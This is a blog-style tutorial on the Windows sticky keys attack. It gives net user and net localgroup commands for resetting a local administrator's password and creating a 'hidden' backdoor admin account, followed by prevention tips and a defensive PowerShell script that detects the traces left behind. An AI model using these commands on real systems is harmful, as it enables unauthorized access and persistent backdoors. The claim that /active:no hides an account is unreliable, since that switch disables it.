Sticky keys attack (Part 2)

This is part 2 of my intro to the sticky keys attack. After rebooting the system, we can hit the Shift key 5 times to open a cmd prompt (the replacement for sethc.exe).

Now we can use the GUI or the cmd to install a backdoor user.

Method 1: GUI

In the cmd prompt we type: control userpasswords2

Choose a user that is part of the administrators group and reset the password, or create one.

Method 2: Use the cmd

Get administrators list: net localgroup administrators

(You’ll get a list with all users that belong to the local admin group)

Change the password by typing: net user "username" password

In the example screenshot, rootsh3ll is the username and pass is the new password.

Login with new credentials, Enjoy!

How to create a backdoor user

Create a new user: net user /add hiddenuser secretpassword

Add the user to the local admin group: net localgroup administrators hiddenuser /add

Set the user to hidden: net user hiddenuser /active:no

Check backdoor user visibility: control userpasswords2

The hiddenuser should not be shown.

Preventing the sticky keys attack

  • Encrypt your hard drive
  • Set a BIOS password
  • Disable booting from additional devices (flash drives/USB/CD/DVD)
  • Turn off Sticky Keys (unselect "Turn on Sticky Keys")
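
A defender-side check for the two traces described in this post (a replaced sethc.exe and a local admin account set to /active:no), as an added example that is not part of the original post. It assumes an elevated Windows PowerShell 5.1 session and the default System32 layout; the OriginalFilename comparison is a heuristic.

```powershell
# Added example (not from the original post): audit a Windows host for the
# two artifacts this post describes. Run in an elevated PowerShell 5.1+ session.
$sys32 = Join-Path $env:SystemRoot 'System32'
$sethc = Join-Path $sys32 'sethc.exe'

# --- Check 1: has sethc.exe been replaced by a shell? -----------------------
# Hash the shells that could have been copied over sethc.exe.
$shellHashes = @{}
foreach ($shell in 'cmd.exe', 'WindowsPowerShell\v1.0\powershell.exe') {
    $path = Join-Path $sys32 $shell
    if (Test-Path -LiteralPath $path) {
        $shellHashes[(Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash] = $path
    }
}

if (-not (Test-Path -LiteralPath $sethc)) {
    Write-Warning "sethc.exe is missing from $sys32"
} else {
    $hash = (Get-FileHash -LiteralPath $sethc -Algorithm SHA256).Hash
    if ($shellHashes.ContainsKey($hash)) {
        Write-Warning "sethc.exe is byte-identical to $($shellHashes[$hash])"
    }
    # A renamed binary keeps its embedded version resource. The value can carry
    # a ".mui" suffix, so match on the prefix only.
    $original = (Get-Item -LiteralPath $sethc).VersionInfo.OriginalFilename
    if ($original -notlike 'sethc.exe*') {
        Write-Warning "sethc.exe reports OriginalFilename '$original'"
    }
}

# --- Check 2: disabled local accounts in the Administrators group -----------
# S-1-5-32-544 is the well-known SID of BUILTIN\Administrators (the group name
# is localized, the SID is not). RID 500 is the built-in Administrator account,
# which is disabled by default, so it is skipped.
$adminSids = Get-LocalGroupMember -SID 'S-1-5-32-544' |
    Where-Object { $_.ObjectClass -eq 'User' } |
    ForEach-Object { $_.SID.Value }

Get-LocalUser |
    Where-Object { -not $_.Enabled -and
                   $_.SID.Value -in $adminSids -and
                   $_.SID.Value -notlike '*-500' } |
    Select-Object Name, Enabled, LastLogon, SID
```

Any warning from the first check, or any row returned by the second, is worth investigating.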